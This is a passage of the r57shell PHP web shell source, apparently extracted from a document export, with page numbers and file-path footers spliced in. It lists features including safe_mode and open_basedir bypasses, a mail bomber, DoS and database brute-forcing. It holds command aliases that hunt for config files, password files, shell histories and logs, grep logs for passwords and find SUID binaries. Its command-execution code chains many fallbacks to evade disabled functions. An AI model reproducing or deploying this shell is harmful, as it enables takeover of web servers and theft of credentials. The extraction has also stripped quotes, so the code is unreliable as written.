  51. 51. eng_text97=>checked: , eng_text98=>success: , eng_text99=>/etc/passwd, eng_text100=>Send file to remote ftp server, eng_text101=>Use reverse (user -> resu), eng_text102=>Mail, eng_text103=>Send email, eng_text104=>Send file to email, eng_text105=>To, eng_text106=>From, eng_text107=>Subj, eng_text108=>Mail, eng_text109=>Hide, eng_text110=>Show, eng_text111=>SQL-Server : Port, eng_text112=>Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x), eng_text113=>Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2), eng_text114=>Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2), eng_text115=>Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2), eng_text116=>Copy from, eng_text117=>to, eng_text118=>File copied, eng_text119=>Cant copy file, eng_text120=>Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST, eng_text121=>Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST, eng_text122=>Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x), eng_text123=>Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1),file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  52. 52. eng_text124=>Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2), eng_text125=>Data, eng_text126=>Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0), eng_text127=>Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4), eng_text128=>Modify/Access file (touch), eng_text129=>Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0), eng_text130=>Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1), eng_text131=>Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1), eng_text132=>Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1), eng_text133=>Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4), eng_text134=>Database-bruteforce, eng_text135=>Dictionary, eng_text136=>Creating evil symlink, eng_text137=>Useful, eng_text138=>Dangerous, eng_text139=>Mail Bomber, eng_text140=>DoS, eng_text141=>Danger! Web-daemon crash possible., eng_text142=>Downloaders, eng_text143=>Temp: , eng_text144=>Test bypass safe_mode with load file in mysqli, eng_text145=>Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4), eng_text146=>Max Interation, eng_text147=>, eng_text148=>, eng_text149=>, eng_text150=>,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  53. 53. eng_err0=>Error! Cant write in file , eng_err1=>Error! Cant read file , eng_err2=>Error! Cant create , eng_err3=>Error! Cant connect to ftp, eng_err4=>Error! Cant login on ftp server, eng_err5=>Error! Cant change dir on ftp, eng_err6=>Error! Cant sent mail, eng_err7=>Mail send, ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????. */ $aliases=array( ----------------------------------locate=>, locate httpd.conf files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate httpd.conf >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate vhosts.conf files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate vhosts.conf >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate proftpd.conf files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate proftpd.conf >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate psybnc.conf >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate psybnc.conf >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate my.conf files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate my.conf >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate admin.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate admin.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate cfg.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate cfg.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate conf.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate conf.php >> .$tempdir.grep.txt;catfile:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  54. 54. .$tempdir.grep.txt, locate config.dat files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate config.dat >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate config.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate config.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate config.inc files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate config.inc >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate config.inc.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate config.inc.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate config.default.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate config.default.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate .conf files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate ".conf" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate .pwd files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate ".pwd" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate .sql files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate ".sql" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate .htpasswd files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate ".htpasswd" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate .bash_history files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate ".bash_history" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate .mysql_history files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate ".mysql_history" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate backup files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate backup >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate dump files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate dump >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate priv files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate priv >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, ----------------------------------tar=>, tar -czvf all.tgz -T .$tempdir.grep.txt=>tar -czvf all.tgz -T .$tempdir.grep.txt, ----------------------------------1=>, locate auth_log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate auth_log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate access_log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate access_log >> .$tempdir.grep.txt;catfile:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  55. 55. .$tempdir.grep.txt, locate error_log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate error_log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate auth.log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate auth.log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate access.log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate access.log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate error.log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate error.log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, locate ".log" files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate ".log" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, ----------------------------------2=>, cat /var/log/httpd/auth_log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt=>cat /var/log/httpd/auth_log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt, cat /var/log/httpd/access_log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt=>cat /var/log/httpd/access_log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt, cat /var/log/httpd/error_log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt=>cat /var/log/httpd/error_log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt, cat /var/log/httpd/auth.log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt=>cat /var/log/httpd/auth.log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt, cat /var/log/httpd/access.log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt=>cat /var/log/httpd/access.log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt, cat /var/log/httpd/error.log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt=>cat /var/log/httpd/error.log | grep pass >> .$tempdir.pass.txt;cat .$tempdir.pass.txt, ----------------------------------find=>, find suid files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -perm -04000 -ls >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find suid files in current dir >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find . -type f -perm -04000 -ls >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find sgid files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -perm -02000 -ls >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find sgid files in current dir >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find . -type f -perm -02000 -ls >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find all writable files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -perm -2 -ls >> .$tempdir.grep.txt;cat .$tempdir.grep.txt,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  56. 56. find all writable files in current dir >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find . -type f -perm -2 -ls >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find all writable directories >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type d -perm -2 -ls >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find all writable directories in current dir >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find . -type d -perm -2 -ls >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find all writable directories and files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -perm -2 -ls >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find all writable directories and files in current dir >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find . -perm -2 -ls >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find all .htpasswd files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name .htpasswd >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find all .bash_history files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name .bash_history >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find all .mysql_history files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name .mysql_history >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find all .fetchmailrc files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name .fetchmailrc >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find httpd.conf files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name httpd.conf >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find vhosts.conf files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name vhosts.conf >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find proftpd.conf files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name proftpd.conf >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find admin.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name admin.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find config* files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name "config*" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find cfg.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name cfg.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find conf.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name conf.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find config.dat files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name config.dat >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find config.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name config.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt,file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  57. 57. find config.inc files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name config.inc >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find config.inc.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name config.inc.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find config.default.php files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name config.default.php >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find *.conf files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name "*.conf" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find *.pwd files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name "*.pwd" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find *.sql files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name "*.sql" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find *backup* files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name "*backup*" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find *dump* files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name "*dump*" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, -----------------------------------=>, find /var/ auth_log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find /var/ -type f -name auth_log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find /var/ access_log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find /var/ -type f -name access_log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find /var/ error_log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find /var/ -type f -name error_log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find /var/ auth.log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find /var/ -type f -name auth.log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find /var/ access.log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find /var/ -type f -name access.log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find /var/ error.log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find /var/ -type f -name error.log >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find /var/ "*_log" files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find /var/ -type f -name "*.log" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, find /var/ "*.log" files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find /var/ -type f -name "*.log" >> .$tempdir.grep.txt;cat .$tempdir.grep.txt, ----------------------------------------------------------------------------------------------------=>ls -la );file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  58. 58. $table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; $table_up2 = " ::</div></b></font></td></tr><tr><td>"; $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; $table_end1 = "</td></tr>"; $arrow = " <font face=Webdings color=gray>4</font>"; $lb = "<font color=black>[</font>"; $rb = "<font color=black>]</font>"; $font = "<font face=Verdana size=-2>"; $ts = "<table class=table1 width=100% align=center>"; $te = "</table>"; $fs = "<form name=form method=POST>"; $fe = "</form>"; if(isset($_GET[users])) { if(!$users=get_users(/etc/passwd)) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language._text96]."</font></center>"; } else { echo <center>; foreach($users as $user) { echo $user."<br>"; } echo </center>; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if (!empty($_POST[dir])) { if(@function_exists(chdir)){@chdir($_POST[dir]);} else if(@function_exists(chroot)){ @chroot($_POST[dir]);}; }file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  59. 59. if (empty($_POST[dir])){if(@function_exists(chdir)){$dir = @getcwd();};}else{$dir=$_POST[dir];} $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; if(empty($dir)) { $os = getenv(OS); if(empty($os)){ $os = @php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $unix = 0; } else { $unix = 1; } } } if(!empty($_POST[s_dir]) && !empty($_POST[s_text]) && !empty($_POST[cmd]) && $_POST[cmd] == "search_text") { echo $head; if(!empty($_POST[s_mask]) && !empty($_POST[m])) { $sr = new SearchResult($_POST[s_dir],$_POST[s_text],$_POST[s_mask]); } else { $sr = new SearchResult($_POST[s_dir],$_POST[s_text]); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0)file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  60. 60. { $r .= "<TABLE width=100%>"; foreach($res as $file=>$v) { $r .= "<TR>"; $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); $r .= (!$unix)? str_replace("/","",$file) : $file; $r .= "</b></font></ TD>"; $r .= "</TR>"; foreach($v as $a=>$b) { $r .= "<TR>"; $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; $r .= "</TR>n"; } } $r .= "</TABLE>"; echo $r; } else { echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language._text56]."</B></font></P>"; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die();file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  61. 61. } /*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/ if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;} $SERVER_SOFTWARE = getenv(SERVER_SOFTWARE); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat("&nbsp;",$i); } function ex($cfe) {global $unix,$tempdir; $res = ; if (!empty($cfe)) { if(@function_exists(exec)) { @exec($cfe,$res); $res = join("n",$res); } elseif(@function_exists(shell_exec)) { $res = @shell_exec($cfe); } elseif(@function_exists(system))file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  62. 62. { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@function_exists(passthru)) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@function_exists(popen) && @is_resource($f = @popen($cfe,"r"))) { $res = ""; if(@function_exists(fread) && @function_exists(feof)){ while(!@feof($f)) { $res .= @fread($f,1024); } }else if(@function_exists(fgets) && @function_exists(feof)){ while(!@feof($f)) { $res .= @fgets($f,1024); } } @pclose($f); } elseif(@function_exists(proc_open) && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes))) { $res = ""; if(@function_exists(fread) && @function_exists(feof)){file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  63. 63. while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);} }else if(@function_exists(fgets) && @function_exists(feof)){ while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} } @proc_close($f); } }else{$res = safe_ex($cfe);} return htmlspecialchars($res); } function safe_ex($cfe) {global $unix,$tempdir; $res = ; if (!empty($cfe)) { if(extension_loaded(perl)){ @ob_start(); $safeperl=new perl(); $safeperl->eval("system($cfe)"); $res = @ob_get_contents(); @ob_end_clean(); } elseif(!$unix && extension_loaded(ffi)) { $output=$tempdir.uniqid(NJ); $api=new ffi("[lib=kernel32.dll] int WinExec(char *APP,int SW);");file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  64. 64. if(!@function_exists(escapeshellarg)){$res=$api->WinExec("cmd.exe /c $cfe >"$output"",0);} else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >"$output"",0);} while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix && extension_loaded(win32service)) { $output=$tempdir.uniqid(NJ); $n_ser=uniqid(NJ); if(!@function_exists(escapeshellarg)) {@win32_create_service(array(service=>$n_ser,display=>$n_ser,path=>c:windowssystem32cmd.exe,params= >"/c $cfe >"$output""));} else{@win32_create_service(array(service=>$n_ser,display=>$n_ser,path=>c:windowssystem32cmd.exe,para ms=>"/c ".@escapeshellarg($cfe)." >"$output""));} @win32_start_service($n_ser); @win32_stop_service($n_ser); @win32_delete_service($n_ser); while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix && extension_loaded("win32std")) { $output=$tempdir.uniqid(NJ); if(!@function_exists(escapeshellarg)){@win_shell_execute(..............windowssystem32cmd.exe /c .$cfe. > ".$output.");}file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  65. 65. else{@win_shell_execute(..............windowssystem32cmd.exe /c .@escapeshellarg($cfe). > ".$output.");} while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix) { $output=$tempdir.uniqid(NJ); $suntzu = new COM("WScript.Shell"); if(!@function_exists(escapeshellarg)){$suntzu->Run(c:windowssystem32cmd.exe /c .$cfe. > ".$output.");} else{$suntzu->Run(c:windowssystem32cmd.exe /c .@escapeshellarg($cfe). > ".$output.");} $res=moreread($output); @unlink($output); } elseif(@function_exists(pcntl_exec) && @function_exists(pcntl_fork)) { $res = [~] Blind Command Execution via [pcntl_exec]nn; $output=$tempdir.uniqid(pcntl); $pid = @pcntl_fork(); if ($pid == -1) { $res .= [-] Could not children fork. Exit; } else if ($pid) { if (@pcntl_wifexited($status)){$res .= [+] Done! Command ".$cfe." successfully executed.;} else {$res .= [-] Error. Command incorrect.;} } else { $cfe = array(" -e system("$cfe > $output")"); if(@pcntl_exec(/usr/bin/perl,$cfe)) exit(0);file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  66. 66. if(@pcntl_exec(/usr/local/bin/perl,$cfe)) exit(0); die(); } $res=moreread($output); @unlink($output); } /* elseif(1) { } */ } return htmlspecialchars($res); } function get_users($filename) { $users = $rows = array(); $rows=@explode("n",moreread($filename)); if(!$rows[0]){$rows=@explode("n",readzlib($filename));} if(!$rows[0]) return 0; foreach ($rows as $string) { $user = @explode(":",trim($string)); if(substr($string,0,1)!=#) array_push($users,$user[0]); } return $users;file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]

×